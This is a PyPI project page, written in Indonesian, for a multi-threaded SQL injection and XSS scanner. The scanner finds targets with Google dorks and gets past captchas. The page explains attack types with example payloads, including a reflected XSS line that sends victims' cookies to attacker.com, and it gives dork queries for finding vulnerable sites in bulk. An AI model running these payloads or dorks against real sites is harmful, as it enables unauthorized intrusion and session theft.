SQL Injection & XSS Vulnerability Scanner - Security Research Tool
Project description
XNOXS DORK
SQLi & XSS Vulnerability Scanner v3.0 [Multi-threaded]
Deskripsi
XNOXS DORK adalah tool keamanan untuk mendeteksi kerentanan SQL Injection dan XSS (Cross-Site Scripting) pada website. Tool ini menggunakan Google Dork untuk mencari target URL dan melakukan scanning secara otomatis dengan multi-threading.
For Security Research Purposes Only
Apa itu SQL Injection (SQLi)?
Definisi
SQL Injection adalah teknik serangan yang memanfaatkan celah keamanan pada aplikasi web yang tidak memvalidasi input pengguna dengan benar. Penyerang menyisipkan kode SQL berbahaya ke dalam query database melalui input form, URL parameter, atau cookie.
Cara Kerja
- Aplikasi web menerima input dari pengguna (contoh:
id=1) - Input tersebut langsung dimasukkan ke dalam query SQL tanpa validasi
- Penyerang memodifikasi input dengan kode SQL (contoh:
id=1' OR '1'='1) - Database mengeksekusi query yang sudah dimodifikasi
- Penyerang mendapatkan akses ke data yang seharusnya tidak bisa diakses
Jenis SQL Injection
Error-based SQLi
Memanfaatkan pesan error database yang ditampilkan untuk mengekstrak informasi.
https://example.com/product.php?id=1'
Blind SQL Injection (Boolean-based)
Tidak menampilkan error, tapi response berbeda berdasarkan true/false condition.
https://example.com/product.php?id=1' AND '1'='1 (response normal)
https://example.com/product.php?id=1' AND '1'='2 (response berbeda)
Time-based Blind SQLi
Menggunakan delay untuk mendeteksi vulnerability.
https://example.com/product.php?id=1' AND SLEEP(5)--
Dampak SQL Injection
- Data Breach - Pencurian data sensitif (username, password, data pribadi, kartu kredit)
- Authentication Bypass - Login tanpa password yang valid
- Data Manipulation - Mengubah atau menghapus data di database
- Remote Code Execution - Mengeksekusi perintah sistem pada server
- Full Server Takeover - Mengambil alih kontrol penuh server database
Apa itu Cross-Site Scripting (XSS)?
Definisi
XSS adalah kerentanan keamanan yang memungkinkan penyerang menyuntikkan script berbahaya (biasanya JavaScript) ke halaman web yang dilihat oleh pengguna lain. Script tersebut dieksekusi di browser korban dengan konteks keamanan website yang rentan.
Reflected XSS
Cara Kerja
- Penyerang membuat URL berbahaya yang berisi script
- Korban mengklik URL tersebut (biasanya melalui phishing)
- Server merefleksikan script ke halaman response
- Browser korban mengeksekusi script berbahaya
- Script mencuri cookie, session, atau data sensitif lainnya
Contoh Serangan
URL Normal:
https://example.com/search?q=laptop
URL dengan Reflected XSS:
https://example.com/search?q=<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>
Dampak Reflected XSS
- Session Hijacking - Mencuri session cookie untuk mengambil alih akun
- Credential Theft - Membuat form login palsu untuk mencuri password
- Keylogging - Merekam semua keystroke korban
- Phishing - Menampilkan konten palsu yang terlihat asli
- Malware Distribution - Mengarahkan korban ke situs berbahaya
DOM-based XSS
Definisi
DOM XSS adalah varian XSS dimana payload berbahaya dieksekusi sebagai hasil dari modifikasi DOM (Document Object Model) di browser korban. Berbeda dengan Reflected XSS, serangan ini terjadi sepenuhnya di sisi client tanpa melibatkan server.
Cara Kerja
- Halaman web menggunakan JavaScript untuk membaca data dari URL (source)
- Data tersebut ditulis ke halaman tanpa sanitasi (sink)
- Penyerang memanipulasi URL dengan payload berbahaya
- JavaScript di halaman mengeksekusi payload tersebut
- Serangan terjadi tanpa request ke server
Sources (Sumber Data Berbahaya)
document.URL
document.location
document.referrer
window.name
location.hash
location.search
localStorage
sessionStorage
Sinks (Titik Eksekusi Berbahaya)
eval()
innerHTML
outerHTML
document.write()
setTimeout()
setInterval()
element.src
element.href
jQuery.html()
Dampak DOM XSS
- Sama dengan Reflected XSS - Session hijacking, credential theft, dll
- Sulit Dideteksi - Tidak ada jejak di server logs
- Bypass WAF - Web Application Firewall tidak bisa mendeteksi
- Persistent dalam SPA - Bisa bertahan di Single Page Applications
Perbandingan Jenis XSS
| Aspek | Reflected XSS | DOM-based XSS |
|---|---|---|
| Lokasi Eksekusi | Server → Client | Client Only |
| Server Logs | Ada jejak | Tidak ada jejak |
| Deteksi WAF | Bisa dideteksi | Sulit dideteksi |
| Payload di Response | Ya | Tidak |
| Memerlukan JavaScript | Tidak selalu | Ya |
Fitur Tool
- Google Dork Scanner - Mencari target URL menggunakan Google Dork dengan pagination (hingga 100+ URL)
- SQL Injection Detection - Mendeteksi kerentanan SQLi (Error-based & Blind)
- Blind SQLi Detection - Boolean-based dan Time-based blind injection
- Reflected XSS Detection - Mendeteksi kerentanan Reflected XSS dengan berbagai payload
- DOM-based XSS Detection - Analisis source & sink untuk mendeteksi DOM XSS
- Multi-threaded Scanning - Scanning paralel untuk performa lebih cepat
- Import URL dari File - Scan batch URL dari file txt
- Export Hasil - Export ke JSON, CSV, atau HTML Report
- CLI Mode - Jalankan dari command line dengan arguments
- ScraperAPI Integration - Bypass Google captcha untuk hasil pencarian yang lebih andal
Instalasi
Install dari PyPI (Recommended - Semua Platform)
pip install xnoxs-dork
Setelah install, langsung jalankan:
xnoxs-dork
Termux (Android)
pkg update && pkg install python
pip install xnoxs-dork
xnoxs-dork
Install dari Source
git clone https://github.com/developerxnoxs/xnoxs-dork.git
cd xnoxs-dork
pip install -e .
xnoxs-dork
Penggunaan
Direct Command (Recommended)
xnoxs-dork
Interactive Mode (Alternative)
python xnoxs_dork.py
Menu Utama
[1] Scan dengan Google Dork (Multi-threaded)
[2] Scan URL Tunggal
[3] Scan URL dari File
[4] Lihat Hasil Vulnerability
[5] Export Hasil
[6] Pengaturan
[7] Tentang Tool
[0] Keluar
CLI Mode
# Scan single URL
python xnoxs_dork.py -u "http://example.com/page.php?id=1"
# Scan dari file
python xnoxs_dork.py -f urls.txt
# Scan dengan Google Dork
python xnoxs_dork.py -d "inurl:php?id="
# Dengan output file
python xnoxs_dork.py -u "http://example.com/?id=1" -o results.json
# Custom threads dan timeout
python xnoxs_dork.py -f urls.txt -t 10 --timeout 15
# Lihat bantuan
python xnoxs_dork.py --help
CLI Arguments
| Argument | Deskripsi |
|---|---|
-u, --url |
Single URL untuk scan |
-f, --file |
File berisi daftar URL |
-d, --dork |
Google dork query |
-o, --output |
Output file (json/csv/html) |
-t, --threads |
Jumlah thread (default: 5) |
--timeout |
Request timeout dalam detik (default: 10) |
-r, --results |
Max hasil dari dork (default: 100) |
Contoh Google Dork
inurl:php?id=
inurl:product.php?id=
site:example.com inurl:?id=
inurl:index.php?page=
inurl:article.php?id=
inurl:news.php?id=
inurl:item.php?id=
Format File URL
# Contoh urls.txt
http://example1.com/page.php?id=1
http://example2.com/product.php?cat=5
https://example3.com/news.php?id=10
# Baris dengan # akan diabaikan
Export Hasil
Tool ini mendukung export hasil ke 3 format:
JSON
{
"scan_date": "2024-01-15T10:30:00",
"total_vulnerabilities": {
"sqli": 5,
"blind_sqli": 2,
"xss": 3,
"dom_xss": 1
},
"sql_injection": [...],
"reflected_xss": [...],
"dom_xss": [...]
}
CSV
Format tabel dengan kolom: Type, URL, Parameter, Details, Severity
HTML Report
Report visual dengan styling modern, mudah dibaca dan di-share.
Pengaturan
| Setting | Default | Deskripsi |
|---|---|---|
| Threads | 5 | Jumlah thread untuk scanning paralel |
| Timeout | 10s | Timeout request dalam detik |
| Results | 100 | Jumlah maksimal URL dari Google Dork |
Database yang Didukung
Tool ini dapat mendeteksi error SQL Injection dari berbagai database:
- MySQL / MariaDB
- PostgreSQL
- Microsoft SQL Server
- Oracle
- SQLite
- IBM DB2
- Generic SQL Errors
Disclaimer
PERINGATAN PENTING
Tool ini dibuat HANYA untuk tujuan edukasi dan penelitian keamanan yang sah.
- Jangan gunakan tool ini pada sistem tanpa izin tertulis dari pemilik
- Penggunaan ilegal adalah tanggung jawab pengguna sepenuhnya
- Pastikan Anda memahami hukum cyber crime di negara Anda
- Selalu lakukan pengujian pada lingkungan yang Anda miliki atau memiliki izin
Requirements
- Python 3.9+
- colorama
- requests
- xnoxs-engine
Changelog
v3.0
- Tambah Blind SQL Injection detection (Boolean-based)
- Tambah Time-based SQL Injection detection
- Tambah fitur Import URL dari file
- Tambah fitur Export ke JSON/CSV/HTML
- Tambah CLI mode dengan arguments
- Update menu dan UI
v2.2
- Multi-threaded scanning
- DOM-based XSS detection
- ScraperAPI integration
Lisensi
MIT License
Author
XNOXS Team - github.com/developerxnoxs
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file xnoxs_dork-1.0.1.tar.gz.
File metadata
- Download URL: xnoxs_dork-1.0.1.tar.gz
- Upload date:
- Size: 37.3 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.11.13
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
e3cf4093fb952eb81acd950600672bfead52c2c35fa410250b9126203825e22d
|
|
| MD5 |
0f4b7f4bd5eca3ce0f12f20ae8b2d320
|
|
| BLAKE2b-256 |
270a9c3b187504285c33e0a9c87fccc4a5bae72d5c1041b796568b4fab8a6e5a
|
File details
Details for the file xnoxs_dork-1.0.1-py3-none-any.whl.
File metadata
- Download URL: xnoxs_dork-1.0.1-py3-none-any.whl
- Upload date:
- Size: 37.2 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.11.13
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
30294e7556b47859555d5a9af0229fc9a51ffe4798426878dd391134db72efb8
|
|
| MD5 |
7fff2a948ded9807199628cc79fd3cf4
|
|
| BLAKE2b-256 |
afccd8ed15c5182572bde03d23efa5b8a9accd161dab44aee75ef53ad4f1c6ec
|